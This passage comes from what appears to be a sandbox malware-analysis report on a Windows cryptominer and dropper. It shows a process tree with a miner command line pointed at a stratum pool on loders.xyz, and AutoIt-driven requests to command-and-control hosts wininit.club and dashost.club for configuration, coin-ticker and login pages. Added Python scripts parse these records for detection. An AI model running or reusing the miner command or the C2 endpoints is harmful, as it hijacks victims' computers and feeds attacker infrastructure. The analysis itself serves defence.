    • C:\ProgramData\WindowsTask\MicrosoftHost.exe
      C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4640
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k networkservice -s TermService
  1⤵
  PID:5028
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:4568
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
    PID:4244
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      PID:4424
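The miner command line in the process tree above and the DNS answers and HTTP requests in the Network section that follows are raw sandbox observations. The Python below is an added example, not code from the sandbox report and not from XMRig, RMS or any other tool the report names; it pulls indicators out of those observations: it parses the xmrig-style arguments to recover pool host and port, the -u value, thread count and donate level and flags the stratum scheme, ties each captured HTTP request to the process that sent it, the host's resolved IP and the AutoIt User-Agent both droppers share, and lists names that were resolved but never used as an HTTP Host header. The sample strings are transcribed from this page; the option tables, the ip-api.com role label and every function name are assumptions of this example.

```python
# Added example, not code from the sandbox report or from XMRig, RMS or any
# tool the report names. Sample strings are transcribed from this page; the
# option tables, role labels and function names are this example's assumptions.
import shlex
from urllib.parse import urlsplit

# Constructed samples, copied from the process tree and Network section of this page.
MINER_CMDLINE = (r"C:\ProgramData\WindowsTask\MicrosoftHost.exe "
                 "-o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1")
HTTP_REQUESTS = [  # (process, raw request as captured)
    ("winit.exe", "GET /json HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: ip-api.com\r\nCache-Control: no-cache"),
    ("update.bin.exe", "GET /STATUS.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: wininit.club\r\nCache-Control: no-cache"),
    ("update.bin.exe", "GET /L.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: wininit.club\r\nCache-Control: no-cache"),
]
DNS_ANSWERS = {  # name -> A record from the DNS entries
    "rms-server.tektonit.ru": "185.175.44.167", "ip-api.com": "208.95.112.1",
    "freemail.freehost.com.ua": "194.0.200.251", "wininit.club": "109.248.11.138",
}
# Assumption: the binary takes stock xmrig options. A short option may carry its
# value glued on (-t1); a long one takes --name=value or --name value.
SHORT_WITH_VALUE = {"o": "pool", "u": "user", "p": "password", "t": "threads"}
LONG_WITH_VALUE = {"url": "pool", "user": "user", "pass": "password",
                   "threads": "threads", "donate-level": "donate_level"}
FLAGS = {"-k": "keepalive", "--keepalive": "keepalive"}
# Assumption: ip-api.com is a public geolocation service, so that request is
# victim profiling; hosts absent from this table are left unattributed.
HOST_ROLES = {"ip-api.com": "geolocation lookup"}


def parse_miner_cmdline(cmdline):
    """Recover pool, user, threads and donate level from an xmrig-style command line."""
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows backslashes
    fields, i = {"image": tokens[0]}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in FLAGS:
            fields[FLAGS[tok]] = True
        elif tok.startswith("--"):
            name, has_eq, value = tok[2:].partition("=")
            if name in LONG_WITH_VALUE:
                if not has_eq and i + 1 < len(tokens):
                    i, value = i + 1, tokens[i + 1]
                fields[LONG_WITH_VALUE[name]] = value
        elif len(tok) >= 2 and tok[0] == "-" and tok[1] in SHORT_WITH_VALUE:
            value = tok[2:]  # glued value, e.g. -t1 -> "1"
            if not value and i + 1 < len(tokens):
                i, value = i + 1, tokens[i + 1]
            fields[SHORT_WITH_VALUE[tok[1]]] = value
        i += 1
    if "pool" in fields:  # urlsplit accepts the stratum+tcp scheme
        url = urlsplit(fields["pool"])
        fields.update(pool_scheme=url.scheme, pool_host=url.hostname, pool_port=url.port)
    return fields


def is_stratum_miner(fields):
    """A stratum pool URL on the command line is the tell the report's signature keys on."""
    return str(fields.get("pool_scheme", "")).startswith("stratum")


def parse_request(raw):
    """Split a captured request into method, path and a lower-cased header map."""
    request_line, *header_lines = raw.replace("\r\n", "\n").split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def http_indicators(requests, dns):
    """One row per request: process, URL, resolved IP, and whether it carried the
    AutoIt User-Agent that both droppers share in this capture."""
    rows = []
    for process, raw in requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        ua = req["headers"].get("user-agent", "")
        rows.append({"process": process, "url": f"http://{host}{req['path']}",
                     "ip": dns.get(host, "unresolved"), "user_agent": ua,
                     "autoit": ua == "AutoIt", "role": HOST_ROLES.get(host, "unattributed")})
    return rows


def hosts_without_http(requests, dns):
    """Names resolved in the capture but never used as an HTTP Host header, so
    whatever contacted them spoke something other than plain HTTP."""
    used = {parse_request(raw)["headers"].get("host") for _, raw in requests}
    return sorted(name for name in dns if name not in used)


if __name__ == "__main__":
    miner = parse_miner_cmdline(MINER_CMDLINE)
    print("miner:", miner, "stratum pool:", is_stratum_miner(miner))
    for row in http_indicators(HTTP_REQUESTS, DNS_ANSWERS):
        print("http:", row)
    print("resolved but not used over HTTP:", hosts_without_http(HTTP_REQUESTS, DNS_ANSWERS))
```

Two things the output makes visible that the raw listing does not: the -u value on this command line is the literal string CPU rather than a wallet address, so the pool itself decides where the hashes are credited, and two of the four resolved names (rms-server.tektonit.ru and freemail.freehost.com.ua) never appear in an HTTP request, which means the traffic to them is not in the HTTP view of this capture.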

Network

• DNS
  rms-server.tektonit.ru
  Remote address: 8.8.8.8:53
  Request: rms-server.tektonit.ru IN A
  Response: rms-server.tektonit.ru IN A 185.175.44.167
• DNS
  ip-api.com
  Remote address: 8.8.8.8:53
  Request: ip-api.com IN A
  Response: ip-api.com IN A 208.95.112.1
• GET
  http://ip-api.com/json
  winit.exe
  Remote address: 208.95.112.1:80
  Request
  GET /json HTTP/1.1
  User-Agent: AutoIt
  Host: ip-api.com
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Wed, 18 Nov 2020 13:40:37 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 322
  Access-Control-Allow-Origin: *
  X-Ttl: 48
  X-Rl: 43
• DNS
  freemail.freehost.com.ua
  Remote address: 8.8.8.8:53
  Request: freemail.freehost.com.ua IN A
  Response: freemail.freehost.com.ua IN A 194.0.200.251
• DNS
  wininit.club
  Remote address: 8.8.8.8:53
  Request: wininit.club IN A
  Response: wininit.club IN A 109.248.11.138
• GET
  http://wininit.club/STATUS.html
  update.bin.exe
  Remote address: 109.248.11.138:80
  Request
  GET /STATUS.html HTTP/1.1
  User-Agent: AutoIt
  Host: wininit.club
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Wed, 18 Nov 2020 13:40:46 GMT
  Server: Apache/2.4.25 (Debian)
  Last-Modified: Wed, 23 Sep 2020 12:26:16 GMT
  ETag: "6-5affa30aaa2a7"
  Accept-Ranges: bytes
  Content-Length: 6
  Content-Type: text/html
• GET
  http://wininit.club/L.html
  update.bin.exe
  Remote address: 109.248.11.138:80
  Request
  GET /L.html HTTP/1.1
  User-Agent: AutoIt
  Host: wininit.club
  Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:46 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "4-5aff97cbe9aa2"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/P.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /P.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:47 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "c-5aff97cbe0e04"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /S.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "d-5aff97cbc970a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            109.248.11.138
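The flows above are all left at flag-unknown by the sandbox, but together they form a pattern worth a detection: a hard-coded `AutoIt` User-Agent, static `/L.html`, `/P.html`, `/S.html` and `/L2.html` paths on wininit.club (109.248.11.138), and `text/html` bodies of 4 to 13 bytes, fetched first by `update.bin.exe` and then again by the dropped `taskhost.exe`. Bodies that small are almost certainly short configuration strings rather than web pages; the report does not show their contents. Stock Apache's default ETag (`FileETag MTime Size`) has the shape `"<size-hex>-<mtime-hex>"`, and the first field here matches Content-Length in every response (6, 4, c=12, d=13), which lets the size be confirmed from headers alone. The following triage script is an added example, not part of the sandbox report: it parses records in this shape, flags the pattern, and reduces the hits to IOCs. The sample input is a constructed, compacted transcription of two of the records above (Date and Last-Modified dropped); the parser expects that compact layout, and the ETag check assumes a stock Apache ETag format.

```python
"""Triage helper: parse sandbox HTTP flow records and flag tiny config fetches."""
import re
from dataclasses import dataclass

# Constructed sample: a compacted transcription of two records from the report
# above (Date/Last-Modified headers dropped). Not a raw capture.
SAMPLE_FLOWS = """\
• flag-unknown  GET  http://wininit.club/L.html  update.bin.exe
Remote address: 109.248.11.138:80
Request
GET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
ETag: "4-5aff97cbe9aa2"
Content-Length: 4
Content-Type: text/html
• flag-unknown  GET  http://wininit.club/P.html  taskhost.exe
Remote address: 109.248.11.138:80
Request
GET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
ETag: "c-5aff97cbe0e04"
Content-Length: 12
Content-Type: text/html
"""

ENTRY_MARK = "• flag-unknown"   # one record per marker, as rendered in the report


@dataclass
class HttpFlow:
    method: str
    url: str
    process: str
    remote: str
    request_headers: dict
    status: str
    response_headers: dict


def _headers(lines):
    """'Name: value' lines -> dict keyed by lower-cased header name."""
    out = {}
    for ln in lines:
        if ": " in ln:
            name, value = ln.split(": ", 1)
            out[name.lower()] = value
    return out


def parse_flows(text):
    """One HttpFlow per HTTP record; DNS records (a different shape) are skipped."""
    flows = []
    for chunk in text.split(ENTRY_MARK):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        head = lines[0].split()             # ['GET', url, process] or ['DNS', name]
        if head[0] == "DNS" or len(head) < 3:
            continue
        remote = next(ln for ln in lines if ln.startswith("Remote address:")).split(": ", 1)[1]
        req_i, resp_i = lines.index("Request"), lines.index("Response")
        flows.append(HttpFlow(
            head[0], head[1], head[2], remote,
            request_headers=_headers(lines[req_i + 2:resp_i]),   # skip the request line
            status=lines[resp_i + 1],
            response_headers=_headers(lines[resp_i + 2:]),       # skip the status line
        ))
    return flows


def etag_size(etag):
    """Stock Apache (FileETag MTime Size) emits "<size-hex>-<mtime-hex>". Returns the
    advertised size, or None for any other ETag shape. Lets Content-Length be
    cross-checked from headers alone, since the sandbox kept no bodies."""
    m = re.fullmatch(r'"?([0-9a-f]+)-[0-9a-f]+"?', etag)
    return int(m.group(1), 16) if m else None


def flag_config_fetches(flows, max_body=64):
    """Flows with the pattern in this report: hard-coded 'AutoIt' User-Agent and a
    text/html body only a few bytes long (a value, not a page)."""
    hits = []
    for f in flows:
        ua = f.request_headers.get("user-agent", "")
        clen = int(f.response_headers.get("content-length", "0"))
        ctype = f.response_headers.get("content-type", "")
        if ua == "AutoIt" and ctype.startswith("text/html") and 0 < clen <= max_body:
            hits.append(f)
    return hits


def iocs(flows):
    """Collapse flagged flows into the indicators a responder blocks or hunts on."""
    return {
        "hosts": sorted({f.request_headers.get("host", "") for f in flows}),
        "remotes": sorted({f.remote for f in flows}),
        "urls": sorted({f.url for f in flows}),
        "processes": sorted({f.process for f in flows}),
    }
```

The `processes` list in the IOC output is the detail to carry into the host-side investigation: the same URLs are pulled by the original `update.bin.exe` and by `taskhost.exe`, so the dropped copy re-reads the same remote configuration, and blocking wininit.club alone leaves the persistent component in place.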
• flag-unknown  GET  http://wininit.club/L2.html  taskhost.exe
Remote address: 109.248.11.138:80
Request
GET /L2.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:47 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:37:46 GMT
ETag: "6-5aff98331e094"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
• flag-unknown  GET  http://wininit.club/L.html  taskhost.exe
Remote address: 109.248.11.138:80
Request
GET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:48 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "4-5aff97cbe9aa2"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
• flag-unknown  GET  http://wininit.club/P.html  taskhost.exe
Remote address: 109.248.11.138:80
Request
GET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:49 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "c-5aff97cbe0e04"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /S.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:50 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "d-5aff97cbc970a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            185.212.148.107
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/STATUS.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
                                                                                                                                                                                                                                                                            ETag: "6-5aff46784bb87"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/loaderTOP.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/loaderTOP.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Content-Length: 274
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/LTC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /LTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff4671e9f6e"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
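The requests above share one fingerprint: a process called taskhost.exe (the guest is windows10_x64, where the native host process is taskhostw.exe) fetching tiny HTML files with the header User-Agent: AutoIt, the default user agent of AutoIt's Inet* functions, from domains named after Windows processes (wininit.club, dashost.club). The following Python is an added example, not part of this report or of any tool it was produced with: it parses request records of the shape shown here and flags them. The sample records are constructed from the entries on this page plus one constructed benign browser request as a control; the lookalike-name list and the ticker-path heuristic (suggested by the BTC.html and LTC.html fetches, whose purpose the report does not state) are assumptions made for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample records copied from the entries in this report, plus one
# benign browser request (also constructed) as a control that must not fire.
# Each record: (sending process, remote socket, raw HTTP request text).
SAMPLE_RECORDS = [
    ("taskhost.exe", "109.248.11.138:80",
     "GET /P.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: wininit.club\r\n"
     "Cache-Control: no-cache\r\n\r\n"),
    ("taskhost.exe", "185.212.148.107:80",
     "GET /ex20mac/STATUS.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: dashost.club\r\n"
     "Cache-Control: no-cache\r\n\r\n"),
    ("taskhost.exe", "185.212.148.107:80",
     "GET /BTC.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: dashost.club\r\n"
     "Cache-Control: no-cache\r\n\r\n"),
    ("msedge.exe", "93.184.216.34:443",
     "GET / HTTP/1.1\r\nHost: example.com\r\n"
     "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\r\n"),
]

# Stems of Windows host-process names that the report's domains imitate
# (wininit.club, dashost.club). The list itself is an assumption for this example.
WINDOWS_BINARY_STEMS = {"wininit", "dashost", "taskhost", "taskhostw", "svchost", "csrss", "lsass"}
# Default User-Agent of AutoIt's Inet* functions, as seen in every request in the report.
SCRIPT_RUNTIME_UAS = {"autoit"}
# Assumed heuristic: paths named after coin tickers, like the report's BTC.html / LTC.html.
TICKER_PATH = re.compile(r"^/(BTC|LTC|ETH|XMR|DOGE|DASH)\.html?$", re.IGNORECASE)


@dataclass
class HttpRequest:
    process: str
    remote: str
    method: str
    path: str
    headers: dict  # header names lower-cased


def parse_request(process: str, remote: str, raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.x request head into a record; any body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(process, remote, method, path, headers)


def reasons_for(req: HttpRequest) -> list:
    """Return the heuristics a request trips; an empty list means not flagged."""
    reasons = []
    ua = req.headers.get("user-agent", "").lower()
    host = req.headers.get("host", "").lower()
    host_stem = host.split(".", 1)[0]
    proc_stem = req.process.lower().rsplit(".", 1)[0]
    if ua in SCRIPT_RUNTIME_UAS:
        reasons.append(f"scripting-runtime User-Agent {ua!r}")
    if host_stem in WINDOWS_BINARY_STEMS:
        reasons.append(f"host {host!r} imitates a Windows process name")
    if proc_stem in WINDOWS_BINARY_STEMS and not ua.startswith("mozilla/"):
        # A Windows host process has no business speaking HTTP with a non-browser UA.
        reasons.append(f"process {req.process!r} named like a system binary sends non-browser HTTP")
    if TICKER_PATH.match(req.path):
        reasons.append(f"path {req.path!r} named after a coin ticker")
    return reasons


def flag_records(records) -> list:
    """Parse every record and return (process, host, path, reasons) for the flagged ones."""
    hits = []
    for process, remote, raw in records:
        req = parse_request(process, remote, raw)
        reasons = reasons_for(req)
        if reasons:
            hits.append((req.process, req.headers.get("host", ""), req.path, reasons))
    return hits


if __name__ == "__main__":
    for process, host, path, reasons in flag_records(SAMPLE_RECORDS):
        print(f"{process} -> http://{host}{path}")
        for reason in reasons:
            print(f"    {reason}")
```

Run against the constructed records, the three taskhost.exe requests are flagged on at least three heuristics each and the browser request on none. In practice the User-Agent and process-name checks are the durable ones; the domain and ticker lists are specific to this sample and should be fed from threat intel rather than hard-coded.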
• GET http://dashost.club/BTC.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /BTC.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:49 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
    ETag: "22-5aff46713647c"
    Accept-Ranges: bytes
    Content-Length: 34
    Content-Type: text/html
• GET http://dashost.club/ETH.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /ETH.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:51 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
    ETag: "2a-5aff467198e94"
    Accept-Ranges: bytes
    Content-Length: 42
    Content-Type: text/html
• GET http://dashost.club/ZEC.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /ZEC.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:52 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
    ETag: "23-5aff467226829"
    Accept-Ranges: bytes
    Content-Length: 35
    Content-Type: text/html
• GET http://dashost.club/DOGE.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /DOGE.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:53 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
    ETag: "22-5aff46717b9d7"
    Accept-Ranges: bytes
    Content-Length: 34
    Content-Type: text/html
• GET http://dashost.club/ex20mac/Login.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /ex20mac/Login.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:53 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
    ETag: "4-5aff46782796a"
    Accept-Ranges: bytes
    Content-Length: 4
    Content-Type: text/html
• GET http://dashost.club/ex20mac/Password.html
  Process: taskhost.exe
  Remote address: 185.212.148.107:80
  Request
    GET /ex20mac/Password.html HTTP/1.1
    User-Agent: AutoIt
    Host: dashost.club
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Wed, 18 Nov 2020 13:40:53 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
    ETag: "c-5aff46782d72a"
    Accept-Ranges: bytes
    Content-Length: 12
    Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/Server.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/Server.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:54 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
